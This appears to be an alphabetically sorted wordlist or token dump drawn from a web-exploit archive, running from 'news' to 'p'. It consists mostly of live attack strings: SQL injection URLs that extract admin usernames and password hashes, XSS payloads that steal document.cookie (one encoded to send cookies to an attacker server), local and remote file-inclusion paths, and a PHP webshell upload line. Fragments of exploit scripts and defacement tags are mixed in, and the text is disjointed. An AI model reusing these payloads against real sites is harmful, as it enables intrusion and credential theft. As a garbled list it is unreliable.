/?news_edit&id=4'+union+select+1,concat_ws(0x3a,version(),user(),database()),3
news-engine
NewsFeed
newsfeeds
NewsGroupSearchEngine.class.php?gfwww=[Shell]
newsheads.php?heads=..
news.html?id=123%20union%20select%201,1,3,@@version,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19%23
NewsHtmlSearchRenderer.class.php?gfwww=[Shell]
news_id.php?lang=en&id=-92%20union%20select%201,2,3,@@version,5--
NEWSID?ref" method="post" name="main">
news.inc.php
newsite
newsitem.php?id=[SQL]
newskom.php?newsid=-1+union+all+select+1,2,3,4,concat(username,0x3a,pwd,0x3a),6+from+pl_user
newsletter
newsletter2
newsletter_guests.php?action=edit&guest_id="><script>alert(0)<
newsletter.inc.php?lang_path=[cmd_url]
newsletter_new.php?Id=107+and+1=2+UNION%20SELECT%201,2,3,4,5,concat%28user_login,0x3a,user_pass%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50+from+jam_jam2.wp_users
newsletter.php.cgi?PHPSESSID=af92ed633ae0d06d1e24d22520f709f7&action=nl_show&nl=..
newsletter.php?Id=-30%20union%20select%201,@@version,3,4,5,6,7,8,9,10,11,12,13,14
newsletter.php?Id=null[SQL]
newsletter.php?Id=-null+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,@@version,29,30,31,32,33,34,35,36,37,38,39,40
newsletter.php?lng=fr+and+2137718188-60=0+--+
newsletter_threads.php?action=edit&thread_id="><script>alert(0)<
news.list.php
news_manager.php
news_more.php?id=15
news_more.php?id=-9999+union+all+select+1,2,concat(id,0x3a,user,0x3a,pass),4,5,6,7,8+from+users
news_more.php?id=[SQL]
news&name=11
NewsOffice
[news_path]
news.php
news.php">
news.php3
news.php?absolute_path=[shellcode]?
news.php?action=delete&newsid=1&returnto=data:text
news.php?action=delete&news_id=[VID]
news.php?action=news&category=[SQL] 
news.php?act=lirenews&id=-9%20UNION%20SELECT%200,US_pseudo,US_pwd,0,0,0,0,0,0,0%20from%20pphp_user
news.php?admin_theme_dir=..
news.php?aid=0ebd6f54040890e8
news.php?aid=0ebd6f54040890e8&action=edit&news_id=123" method="post">
news.php?aid=0ebd6f54040890e8" method="post">
news.php?ax=v&n=10&id=10&nid=-3+union+select+1,group_concat(username,0x3e,password),3,4,5+from+php_users--
news.php?ax=v&n=10&id=10&nid==[SQL Injection]
news.php?category='
news.php?category=2+AND+1=2+UNION+ALL+SELECT+1,GROUP_CONCAT(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+FROM+simpnews_users--
news.php?CategoryID=[SQL]
news.php?category=[sql]
news.php?cat_id=[BLIND SQLi]             0
news.php?cat=[SQL]
news.php?CONFIG[main_path]=[evil_scripts]
news.php&contentid=-24'%20union%20select%201,2,3,user_status,5,user_nick,user_pw,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%20from%20phpkit_user%20
news.php? co=show&news=99'% 20union%20select% 201,2,3,4,5, 6
news.php?do=
news.php?DOCUMENT_ROOT= [LFI]%00
news.php?do=news&id=1%27+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28database%28%29+as+char%29%29%29%2C0x27%2C0x7e%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+%271%27%3D%271
news.php?front_letmerateit="><script>alert(document.cookie)<
news.php?front_ratebest="><script>alert(document.cookie)<
news.php?front_ratesubmit="><script>alert(document.cookie)<
news.php?front_rating="><script>alert(document.cookie)<
news.php?front_searchsubmit="><script>alert(document.cookie)<
news.php?go=fullnews&newsid=1'
news.php?go=fullnews&newsid=1' 
news.php?id=
news.php?id=-1%27%20union%20select%201,username,password,4,5%20from%20dir_admins
news.php?id=157[sql commends]
news.php?id=1 << and 1=0
news.php?id=1 and 1=1
news.php?id=1 and 1=2
news.php?id=1 and substring(@@version,1,1)=4
news.php?id=1 and substring(@@version,1,1)=5
news.php?id=1 [bSQL]
news.php?id=-1&c_id=[SQL]
news.php?id=1&lang=..
news.php?id=-1+UNION+SELECT+1,2,3,4--	#
news.php?id=-1+union+select+1,2,password,4,5+from+users--#                                        #
news.php?id=-1+union+select+1,2,password,4,5+from+users+--#
news.php?id=-1+union+select+null,null,concat_ws
news.php?id=%27
news.php?id=999999+union+select+1,2,
news.php?id=9[CODE]
news.php?ida=-1
news.php?idfestival=7 (SQL)
news.php?id=<marquee><font color=red size=15>cyberlog bukan hacker :P<
news.php?id=<newsid>%20AND%200%20=%201%20UNION%20SELECT%20*,%201,%201,%201,%201%20FROM%20admins%20--
news.php?idnews=[SQLi]
news.php?id=null+union+all+select+1,2,3,concat_ws(0x3a,email,teacherpass),5+from+teacher--
news.php?id=null+union+select+1,2,concat
news.php?id=[Sql]
news.php?id=[SQL]
news.php?id=[SQLi]
news.php?id=[SQL Injection]
news.php?id=[SQL Injection] 
news.php?limit=%2527 
news.php?mode=voir&nb=-1
news.php?mode=voir&nb=[SQL]
news.php?newsid=
news.php?newsid='
news.php?newsid=1'
news.php?news_id=65 union select 1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12 from users
news.php?newsid=79+union+select+1,aid,3,4+from
news.php?newsid=79+union+select+1,pwd,3,4+from
news.php?newsid=999+union+select+0,username,password+from+newsadmin
news.php?newsid="><script>alert(document.cookie)<
news.php?news_id=[VID]%3E%3Ciframe%3E
news.php?nid=-1+UNION+SELECT+1,2,3,concat_ws(char(58),id,user_nick,user_pass,concat(user_prename,char(0x20),user_name)),5,6+from+t_user--
news.php?nid='&action=view
news.php?nid=<script>alert('takeshix')<
news.php?nr=2"
news.php?page=|sql
news.php?page=[sqli]
news.php?_PX_config[manager_path]=..
news.php?readmore=101
news.php?readmore=102
news.php?readmore=108
news.php?readmore=123
news.php?readmore=126
news.php?readmore=127
news.php?readmore=132
news.php?readmore=142
news.php?readmore=165
news.php?readmore=569
news.php?readmore=91
news.php?readmore=97
news.php?readmore=98
news.php\r\n";
news.php?salt="><script>alert(document.cookie)<
[news.php],[sgallery.php],[etc]?id=[SQLi]
news.php?stof=[SQL] 
news.php?view=3(SQL)
news.php?year=-2004+UNION+SELECT+1,2,3,4--
news.php?year=2010[CODE]
[Newsportal_path]
newspost.php?create">
newspro
news-production
news_read.php?id=-1
news_read.php?id=-20 UNION SELECT 1,concat_ws(0x3e,Login,Password,EMail),3,4,5 FROM ADMINS--
news_releases.php?nid=-1+union+select+1,2,3,username,password,6,7+from+phpauthent_users
newsrssmanager
news_script.html
NewsSearchQuery.class.php?gfcommon=[Shell]
news.serverisdown.org ]
newssuite_constants.php?mx_root_path=[shell]
news_summary.php?rootdp=DSecRG&admin_home=..
newssync_1.5.0rc6.tar
newsSync-video.rar
news.typo3.org
newThread.php?boardID=+999999%20union%20select%20email,concat_ws(0x3a,nick,substring(password,1,100)),email,email,email%20from%20user
newthread.php?boardid=[SQL]
newthread.php?do=newthread&f=5');
newthread.php?do=newthread&f=5">');
newthread.php?do=postthread&f=5', 'subject=' + subject + '&message=' + message + '&wysiwyg=0&taglist=&iconid=0&s=&securitytoken=' + sectok + '&f=5&do=postthread&posthash=' + postok + 'poststarttime=1&loggedinuser=1&sbutton=Submit+New+Thread&signature=1&parseurl=1&emailupdate=0&polloptions=4');
newticket.php?lang=[LFI]
newticket.php?lang=[RFI]
newticket.php?lang="><script>alert(document.cookie);<
newtopic.php?forum=-99%20UNION%20SELECT%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,pass,1,1%20FROM%20runcms_users%20WHERE%201
newtopic.php?forumid=1&fbpassword="><script>alert(document.cookie)<
newtopic.php?forumid=1&fbusername="><script>alert(document.cookie)<
newtopic.php?forumid=1&subject="><script>alert(document.cookie)<
newtopic.php?forumID='%3C
newuser.php 
newuser.php, after register, just login and you can explore the sqli.
newuser.php?id=-9999+union+all+select+1,concat(user_name,char(58),user_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+e107_user
newuser.php?id=[exploit]
new_user.php" method="post">
newuser.php" method="POST">
newuser.php" method="POST"> 
newusers
  New (Version 1.3)
/?newyear=2011'+and+substring(@@version,1,1)=4%23&newmonth=01 
/?newyear=2011'+and+substring(@@version,1,1)=5%23&newmonth=01
/?newyear=2011&newmonth=01'+and+substring(@@version,1,1)=4%23
/?newyear=2011&newmonth=01'+and+substring(@@version,1,1)=5%23
/?newyear=[SQL]&newmonth=[SQL]
\n" ; exit 1; }
next
next.frontaccounting.eu
nextgen-gallery
nextgen-smooth-gallery
Nexus
nexusphp
nf_downloads
nfnaddressbook.php?mosConfig_absolute_path=Evil-script?
nfo-edit.php"
nforum
nggSmoothFrame.php?galleryID=2[BLIND-SQL]
nggSmoothFrame.php?galleryID=31[BLIND-SQL]
nggSmoothFrame.php?galleryID=34[BLIND-SQL]
nggSmoothFrame.php?galleryID=[VALID ID][BLIND-SQL]
nice-stash
nick
nicLOR-CMS
night_build
nightly
ninjablog4.8
ninjadesigns.co.uk
ninkobb.test
NION%20SELECT%20ALL%20FROM%20WHERE
nitintest.php
nitrotech.sourceforge.net
nk
nkinfoweb
nl
nlarlist_content.inc.php?use_template_family=[LFI]
nlb
nlcac.internationalstudents.asn.au
nlettertailor
nl.php?g_strRootDir=[Bad Code]
nmap
nmdeluxe
[nmdeluxe]
 \n\n";
\n\n";
\n\n"; 
\n\n";				#LiVe-Dem0! letZz pwnz the pedophile!!
No='1
noah
nobody.ir
noccw_10_incl_xpl.html
nocude.maisum.net
node
/?NodeID="><script>alert(0)<
nodelist.php?subnet_id='+union+select+1,2,3,4,5,6,7,concat(user_name,char(58),user_pass,char(58),user_displayname)+from+user+where+user_id=[UserID]
/?node=research&article_id=00086-06292005
/?node=research&article_id=00098-02102006              #
/?node=research&article_id=00105-02262006
/?node=research&article_id=00118-07292008
/?node=research&article_id=00120-07312008
/?node=research&article_id=00122-08072008
/?node=research&article_id=00125-08182008
/?node=research&article_id=00128-09022008
/?node=research&article_id=00131-09202008 
nodesforum
nodez
noevents
no-exploit
no-hack.fr
no-hack.net
no-hack.net                                                          #
no-hack.net           						     #
no_html,1
no_html,1.html
no.inc.php?LANG=[evilc0de]
*&nom=1
no_mail.php?html_no_mail=<script>alert(document.cookie)<
NoNameMT>
nonamemt.us
Nonce.php?_ENV[asicms][path]=
none.php?
none.php?..:..:..:..:..:.
[non-existant request]
NON-EXISTENT-PAGE results in
nonumber.nl
nonusers_handler.php?gfplugins=[Shell]
nopaste.info
norcalvex.org
normal
norme_simplifiee.class.php?path_om=[Shell]
noscan.info
noserub
not active
notaevento.php?id_novedad=-1+UNION+SELECT+1,2,3,4+from+admin--
note
 - note only path to flatnuke root directory)<br 
note_overview.php?id=1
/?notepad_body=%2527,%20is_moderator%20=%201,%20is_administrator%20=%201,%20is_superadministrator%20=%201%20WHERE%20username%20=%
/?notepad_body=%2527,%20username%20=%20%2527bookoo%2527,%20password%20=%20md5(%2527pass%2527)%20WHERE%20username%20=%20%2527user%
note.php?gfwww=[Shell]
note.php?note_id=-1%20INSERT%20INTO%20users%20(id.username.password.name.email.can_add_user)%20values%20(1.Kacper.devilteam.Kacper.kacper1964@yahoo.pl.1)
notes
Notes
notes.php
notes.php[html]
notes.php?mode=edit&id=..
notes.php?month=-1 UNION ALL SELECT 1,version(),current_user()--%20
notes.php[sqli]
notes.php?taskid=-999' UNION SELECT 0,0,username,      #
  not free version
notftp
nothing,important,our.file.name.html%00
noticeboardpro
notice.php?msg=
noticias
noticias.php?cat=-1+uniunionon+seleselectct+1,version()--
noticias.php?notiId=-1+union+select+1,GROUP_Concat(id,0x3a,nombre,0x3a,clave),3,4,5,6,7+8+from+auteUsuarios
noticias.php?notiId=-1+union+select+1,GROUP_Concat(id,0x3a,nombre,0x3a,clave),3,4,5,6,7+from+auteUsuarios
noticias.php?notiId=[N.A.S.T ]
notification
notifier=Dark Hackers Team
notify
notifymod.php?Cat=0&Board=UBB5&Number=42173[SQL]&page=0&what=showthreaded 
notify.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
' not in sys.argv[1] :
' not in sys.argv[2] :
notlegal.ws
notsopureedit
not-the-average-sql-injection
nova-blue
novedades
november
now_connect.php HTTP
now(),load_file(0x2f6574632f706173737764)
nowosci.php?a=1&str=<font color=red size=15>CoBRa_21<
nowosci.php?a=1&str=<script>alert(
/?npage=-1&content_dir=..
/?npage=1&content_dir=..
npage-bigforum
npds
npds_p.gif","xslogan" => "NPDS SABLE",
NP_gallery.php?DIR_NUCLEUS=[evilc0de]
nphp
nphpd.php?nphp_config[LangFile]=
nph-proxy3.cgi
n-pn.info
NP_Twitter.php?DIR_PLUGINS=[evilc0de]
nqgeoip2.php?body=<script>alert(document.cookie)<
nqgeoip2.php?step=<script>alert(document.cookie)<
nqgeoip.php?step=<script>alert(document.cookie)<
nqports2.php?body=<script>alert(document.cookie)<
nqports2.php?step=<script>alert(document.cookie)<
nqports.php?step=<script>alert(document.cookie)<
ns
NSSPGSQL.class.php?gfcommon=[Shell]
nst.gif.php?nst=ls -la 
 ---| \n"; &the_end; } sub the_end { print "+-----------------------------------------+\n"; exit; } sub header { print "\n+-----------------------------------------+\n"; print "| News <= 5.2 SQL Injection (cmd exec) ---|\n"; print "+-----------------------------------------+\n"; }
 \nTraget : ";
nuboard
nubuilder
nubuilder-10.04.20
nucleus
nucleuscms
nucleuscms.org
nudn?file=2
nuggetz
nuke
nuke70
nuke71
nuke72
nuke73
nuke75
nuke78
nuke78p
nukeai
NukeAI
nuke_authors
nuked
[nuke_dir]
nuked.php?blok[type]=[EV!L]
NUKEDSITE
NukeHall
nukeit.org
nukeit.org -
nuke_path
nuke_users
null
null,
" ) ) == NULL) 
null,101,null,1,null,null,passwd,null,null,nick,null
nullam.net
NullArea.Net
',null,$argv[1]);
null,concat(CHAR(60,66,82,62),concat_ws(char(58),user_name,password)),null
null,concat(loginname,0x3a,password),null
',NULL,$host);
, NULL, NULL, 0, DEVILTEAM, NOW(), 99999, 99999, 99999, 9999, offline, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, 0, 4)
null,null,CONCAT(login,CHAR(58),password),null
null,null,concat(member_email,'-',member_password),null,null,null,null,null,null,null
null,null,mname,null,mpassword,null,null
null,null,null,concat(0x273e3c2f74643e,username,0x3a,password,0x3a,email,0x3c62723e3c2f2f),null,null
null,null,null,null,null,null,null,null,login,passwort,null,null,null,null,null
null,null,null,null,null,null,null,null,null,null,null,concat(userid,0x3a,password)
null,null,null,null,null,password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,username
null,null,null,null,null,userid,password,null,null
null,null,null,null,null,value,null,null,null,null,null,null,null,null
NULL,NULL,NULL,NULL,uid,uname,pass,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
null,null,password,null
nullstore.net
null,user(),concat(username,0x3e,password),null,null,database(),null,null,null
numberlinks1
numberlinks1.php
[numbers]
num_questions.php?quiz=-1+UNION+ALL+SELECT+concat(user(),0x3A3A3A,version())
num_questions.php?quiz=-1+UNION+ALL+SELECT+concat(username,0x3A3A3A,password_hash)+FROM+admins
/?num=<script>alert(1);<
nune
\n" unless @ARGV;
nursing
nu_users
nv2-Awards-120-t137847.html
nvd.cfm?cvename=CVE-2007-1899
nvd.nist.gov
nw
nweb2fax
nwlmail.php?lng=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00
nxheader.inc.php?c[path]= [inj3ct0r sh3ll]
nxheader.inc.php?page= [LFI]%00
[NX_PATH]
nxwcms
nx-web-cms-nx-wcms-45-multiple.html
NYF_zC9hH54
o
  \o_)( |
o0xxdark0o3
o12calgold
o12cal.mdb
o12con.mdb
o12faq.mdb
o12mailgold
o12mail.mdb
o12member.mdb
o12poll.mdb
o1x69
o1xkg
o1xnd
o1xoj
oaboard
oai
oauth
obituaries
obj
object><
objects
object_search.php?object_type=&action=&src_form=%22%3E%3Cscript%3Ealert%280%29%3C
objects.php?action=single&OB_ID=106[SQL-INJECTION]
obj.php?ID=3663%27%20name=iframe%20scrolling=no%20style=%27position:absolute;%27%20allowtransparency=%27true%27%3E%3C
obj.php?ID=5312%27%20name=iframe%20scrolling=no%20style=%27position:absolute;%27%20allowtransparency=%27true%27%3E%3C
oBlog
obm2.2
obm-host
obmp22
obophix
obrazy
observer
[observer-0.3.2.1]
oc1551
occasions
occasions.php" method="POST">
OCM
ocp-103
ocs
ocsreports
octet-stream to
odihost-newsletter-plugin
Odocument221.html
odp.php?browse=[code]
odp.php?browse="><script>alert("lol");<
oe
oekaki.php?pc=print "Hello";
oekaki.php?sc=echo Hello
OEM
oerdec
ofbiz.apache.org
ofbizexploiter.php
ofc_upload_image.php?name=shell.php&HTTP_RAW_POST_DATA=<?system($_GET['cmd']);?> 
Oferta.html
offers_buy.php?id=[SQLi]
offers.php?id=[SQLi]
office.php?m=explorer&a='191&b=expand&w=0
office.php?m=lang&langid=en AND PRESS
office.php?m=lang&langid='"><script>alert(1337)<
office.php?m=user&a='pdsony@idola.net.id&b=edit
office.php?m=user&so=asc&sb='CONFIRM
office.php?m=user&so=asc&sb='EMAIL
office.php?m=user&so=asc&sb='GID
office.php?m=user&so=desc&sb='FULL_NAME
office.php?m=workgroup&a='1&b=edit
Official
offl
offline_auth.php" method="POST">
offline.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
offsec101.php turning script kiddies into ninjas daily
&off=true&key=$ 
o.gif?&cmd=cat%20config.php
OGP
ogp_show.php?display=10 and substring(@@version,1,1)=4
ogp_show.php?display=10 and substring(@@version,1,1)=5
ogp_show.php?display=130&sort=&entry=10&search=&search_choice=[html]
ogp_show.php?display=130&sort=&entry=10&search=[sqli]
ograweb.free.fr
oi
oi-download.php
okiraku.php?lang=&day_id=[SQL] 
oku.php?id=1[SQL-Code]
olbookmarks
olbookmarks-0.7.4
old
old.bkworksproducts.info
oldnews_reader.php?lang=[etc
old-post-spinner
 || !$oliv){usage()}
olmobasket.altervista.org
oltan.org
omdemo
omegabill
OmegaBill_v1.0_Build6
omni.netsons.org
omni-secure-files
                                 o\n";
ona
" onChange="control();">')
One1
oneadmin
onecms
OneCMS)\n";
OneCMS_v2.4
onedotoh.sourceforge.net
onefilecms
OneFileCMS
onefilecms.php
onefilecms.php">
onefilecms.php?f=..
onefilecms.php?f=index.php');
onefilecms.php?i=..
onefilecms.php?p=27%22%3e%3c%62%6f%64%79%20%6f%6e%6c%6f%61%64%3d%22%64%6f%63%75%6d%65%6e%74%2e%70%68%69%73%69%6e%67%2e%73%75%62%6d%69%74%28%29%3b%22%3e%3c%66%6f%72%6d%20%6e%61%6d%65%3d%22%70%68%69%73%69%6e%67%22%20%61%63%74%69%6f%6e%3d%22%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%22%3e%3c%2f%66%6f%72%6d%3e%3c%2f%62%6f%64%79%3e%3c%2f%68%74%6d%6c%3e
onefilecms.php?p=%27%22%3E%3C%73%63%72%69%70%74%3E%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%3D%22%68%74%74%70%3A%2F%2F%41%54%54%41%43%4B%45%52%5F%53%45%52%56%45%52%2F%73%74%65%61%6C%65%72%2E%70%68%70%3F%63%6F%6F%6B%69%65%3D%22%2B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3B%3C%2F%73%63%72%69%70%74%3E
onefilecms.php?p='"><html><body onload='document.f.submit()'>
onefilecms.php?p='"><script>document.body.innerHTML="<style>body{visibility:hidden; background:black;}<
onenews_beta2
 " onerror="ANYSCRIPT"[
onguma.class.php?mosConfig_absolute_path=[evilcode]
ongumasa
" onKeyUp="sethost(this.value);" 
online
online&&a=1&language=1&layout=%3Ch1%3E%3Cmarquee%3Ealooo
online_classified_script.html
online.class.php?system_path=[evil_scripts]
onlinecommunity
online-community-php-scripts.html
onlinecommunitys
onlinedemo.php?action=skip
 Online Fantasy Football League 0.2.6
online.gif
online_help
online_help-init.php?gfplugins=[Shell]
online_list.php?view_mode=..
online.php?n=_member%20WHERE%20memberid=-999%20UNION%20SELECT%200,CONCAT(memberid,0x3A,name,0x3A,password),2%20FROM%20vwar_member%20%20
online.php?pidsql=)[sql_query]
online.php?&title=D3vil-0x1<
online-shop.html
onlinesubtitles
Online_Users
onload
"; onload="alert('RedTeam
" OnMouseOver="alert(
 ' onmouseover=alert(1) [
 onmouseover=alert(1) [
' onmouseover=alert(1) [
onmouseover="alert(1)
onsec.ru
" onsubmit="forge()">
OnUploadCompleted\((.*),'(.*)'\)
OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",
OnUploadCompleted\((.*),\"(.*)\"\)
oolime-resurrection
oonboy.info
oonboy.info				|
oonboy.info												    |
oopd
oozv1657
op
op5
op5-shell.js"><
/?op=applyforaccount
/?op=applyfordomainaccount
/?op=applyforftpaccount
) && (($opcao == 1 || $opcao == 2))) {
 opcao \n";
/?op=download&fid=36
op.EditUserData.php" method="POST" enctype="multipart
open
Openads%202.0.11-pr1
openauto
openautoclassifieds
openauto_full_v1.6.3
openbb
open_book.php?book_sn=-1
open_book.php?book_sn=-10
open_book.php?book_sn=-5
open_book.php?book_sn=-99
openBrowser.php?url=%22onload=%22alert%280%29
opencart
opencart1521
openclassifieds
openconf
openconstructor
opencsp
opendb
opendocman
open_document.php?file=..
openeducation.sourceforge.net
openelec
openemr
OpenEMR%20Current
openemr-4.0.0
[OpenEMR_path]
openengine
[openengine20]
openengine.php?oe_classpath=[spread???]
open-flash-chart
openforum
opengoo
openguestbook
openhelpdesk' ],
openi-admin
OpenID
OpenID_logon.php?error=<script>alert(123);<
OpenID_logon.php?msg=<script>alert(123);<
OpenID_logon.php?redirect="+onclick=alert(123)+w="
OpenID_logon.php?success=<script>alert(123);<
openimpro
[open-mediumCMS_path]
opennewsletter
opennews-sun
opennms
OpenNMS_Multiple_Vulnerabilities.pdf
open.php?id=..
openrat
OpenRealEstateV1.5.1_en
openrealtydir
open-realty.org
open-school.org
openSite
opensiteadmin
OpenSiteAdmin
opensite-v0.2.2-beta
opensolution.org
opensourcebrew.org
opensource.org
OpenSource_ReleaseNotes_4.5.1j
) open source task
openstat.php?uid=-1&id=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)
openstats.iz.rs
openwindow.php?hlpfile=")<html><script>alert(document.cookie)<
openwindow.php?hlpfile=x<html><body%20onload=alert(document.cookie);>
openwysiwyg
openx
operator_chattranscript.php?chatid=..
operators.php?remove=1") 
/?op=expdb 
opia
opial 
opis.php?id_phot='+union+select+haslo+from+imgallery_hasla
/?op=login&from=home&nome=<script>alert('LOL');<
/?op=login&nome=<script>alert('LOL');<
/?op=login&url=1&user=<script>alert(123);<
OPM
/?op=mi&id=2&pl="><script>alert(document.cookie)<
&opmod=newfile&filemanager_editor=tfuj_stary&_FNROOTPATH=[EVIl]%OO
OPP
Opportunities
*&op=print_pn
*&op=print_sent_pn 
/?op=prog&mdfd=<script%20type="text
/?op=prog&mdfd=webboard&act=1&ID=1&qType=0'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
op=prog&mdfd=webboard&act=1&ID=1&qType=ID+[SQL]
&op=rate_complete&score=1";
oprema
ops
".$opt_h.$opt_p."
".$opt_h.$opt_p."upload.php?do=verify";
OptimisticLock
optimizer.php?files=..
option
option><
/?option=0" onload=alert(document.cookie) a="
/?option=com_beamospetition&func=sign&mpid=-9999'%20union%20select%200,1,username,password,4,5,6,7,8,9,10,11,12,13,14,15%20from%20jos_users
option,com_docman
option,com_jdirectory
option,com_jdownloads
/?option=com_jooproperty&view=booking&layout=modal&product_id=1%20and%201=0%20union%20select%201,(select group_concat(username,0x3D,password)%20from%20dy978_users)+--+D4NB4R 
option,com_mosipn
/?option=com_mysms&Itemid=0&task=phonebook
/?option=com_question&catID=21' and+1=0 union all     
/?option=com_question&catID=21' and+1=0 union all select  # | 1,2,3,4,5,6,concat(username,0x3a,password),8,9 from jos_users--%20 
/?option=com_question&catID=[SQL]
option,com_remository
/?option=com_rsfiles&view=files&layout=agreement&tmpl=component&cid=1
/?option=content&id=81
options
 [Options]
options-general.php
options-general.php?page=collapsing-archives
options-general.php?page=devformatter
options-general.php?page=mathjax-latex.php" method='POST'>
options-general.php?page=occasions
options-general.php?page=related-ways-to-take-action
options.inc.php
options_name_manager.php?option_page=1&option_order_by=
".$options{"p"});
".$options{"p"}); }
options.php
options.php?action=manage_admin">
options.php?r=admin" method="post">
options.php?username="root"&adm_Group1=
"+options.proxy}
/?options[style_dir]=..
" % (options.target)
" + options.target
"+options.target+options.directory+exploit 
" + options.target + options.dirPath + exploit + "..
"+options.target + options.dirPath + exploit + dDS + log + nB)
"+options.target + options.dirPath + exploit + dDS + log + nB + cmd + cmd64)
" + options.target + options.dirPath + exploit + dDS + testFile + nB)
" + options.target + options.dirPath + "index.php"
"+options.target+options.dirPath + page)
"+options.target + options.dirPath + sName + ".php?p=" + cmd64)
"+options.target + options.dirPath + sName + ".php?p=" + rmShell)
"+options.target+options.path+"index.php
"+options.target+":"+options.port+options.dir+sqli).read()
".$options{"x"});
[opt_path]
'.$opts[u];
".$opts[u];
optusnet.dl.sourceforge.net
op.ViewOnline.php?request=4:6:
oqey-gallery
oqey-headers
oqey_settings.php?img_header_id[]=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20
or
> or
 or
OR
orangehrm
orangehrm-2.6.3
Orange.view
) or !($ARGV[1]==1 or $ARGV[1]==2)) {
) or !$ARGV[1] or ($ARGV[1] ne '2.1.1' and $ARGV[1] ne '2.1.2')) {
orbis
orbis-cms
orbis-cms-arbitrary-script-execution-vulnerability-cve-2010-4313
orca
OrdaSoft
order
orderBuilder
*&orderby=DESCRIPTION
Order.class.php
orderdev.php?step=2 ]
/?order_direction=DESC&&status=1&form_gid=vehicle_user_quick_search_new&back_module=vehicl
order.htm           \
ordering
order_management
order-now.html                                             ¦       ¦                                       ¦
/?order_num=crap&payment=crap&send=first&send=regular&send=priority&send='%3E%3Cscript%3Ealert(document.cookie)%3C
/?order_num=crap&payment=">&lt;script&gt;alert(document.cookie)&lt;
order.php?id=10
order.php?id=5
order_print&order_id=1"><script>alert(document.cookie);<
orders
orders.php?mode='><script>alert(document.cookie)<
orders.php?mode='[SQL-inj]
orders.php?selected_box=customers&status=2"><script>alert(document.cookie)<
ordersys
oreon.conf.php"
org
...org
organisme.class.php?path_om=[Shell]
organizer
[Organizer_Path]
organizers
orgchart
original
" original-class="form-horizontal">
originalvideos
".$oriserver;
orkutclone
or last-name)
 or send 
ortus.nirn.ru
# or &usage;
os
oscailt
osclass
osclass.org
oscommerce
oscommerce_22_adv.html
oscommerce-2.2rc2a
oscommerce-3.0a5
oscommerce_installation
osCSS
oscss2
oscss2-id-parameter-local-file-inclusion-t1999.html
oscss.org
osData
osDate
osdn.dl.sourceforge.net
osgaming.net
osirys
osirys.org
osp
osp1.01RC1.tar
osphpsite
osprey.ibiblio.org
osproperty
oss
ossigeno
ossim
ossim.net
OSSIM-SERVER
osticket
osvdb
osvdb.org
osx.freshmeat.net
otavchat
otavchat{$rtl}.css" 
ote
other
Other-Modules
other.php
others
othersite
OTIRa.png
otm
otmanager
[otmanager_path]
otomigenx
otterware.net
ottoman
[Ottomanpath]
ourscripts_upb.php
oursite.it
out
outage
out.EditFolder.php?folderid=1&showtree=1"><script>alert(1)<
OUTFILE'..
out.FolderAccess.php?folderid=1&showtree=1"><script>alert(1)<
out.FolderNotify.php?folderid=1&showtree=1%22%3E%3Cscript%3Ealert%281%29%3C
outils
OutLawZx ]
out.php
out.php?
out.php?any_word
out.php?id=20' (MySQLi Found)
out.php?id=any_word
out.php?id=hacked-by-indoushka&url=1>"><ScRiPt%20%0d%0a>alert(213771818860)%3B<
out.php?linkid=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11--
output
output.php HTTP
Output.php?path=[EV!L]
output.php?url=L2V0Yy9wYXNzd2Q=
outreach
OutstandingInvoicesPage.class.php?base_path=[evil_scripts]
out.ViewDocument.php?documentid=2&showtree=%22%3E%3Cscript%3Ealert%280%29%3C
out.ViewFolder.php?folderid=3 or 1=1
ovbb
[OvBB_path]
overdose.tcpteam.org
overview
overview.html
overview.html (sell script )
overview.inc.php?rel=[cmd_url]
overview.inc.php?rel=[evil_scripts]
overview.xml
ovh.dl.sourceforge.net
ovidentia
ov_rfiles.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00
owa
owa_1_2_3.tar
owimg.php3?path=[evil script]
owl.php\r\n\r\n";
owls
own
!!!Owned!!!
ownrs
[Ownrs_path]
OxYBox085uns
oxyhistory.php?cmd=dir
oxynews
oxyproject
ozjournals
p
/?p=..
p>
p><
p>"
p 
P
P>
p1
/?p=1
/?p=11
 -p 127.0.0.1:8080' % __file__
P12_ActiveWebHelpdesk.aspx?Tabopen=                          ¦       ¦                                       ¦
/?p=135
/?p=1467
/?p=1467) doesn't fix completely this
/?p=152
 -p 172.167.876.34:8080" % __file__
p1.html" method="post" enctype="multipart
/?p=1\n"
p2
/?p=2
p%20
/?p=2.0.configuration.php">[code]
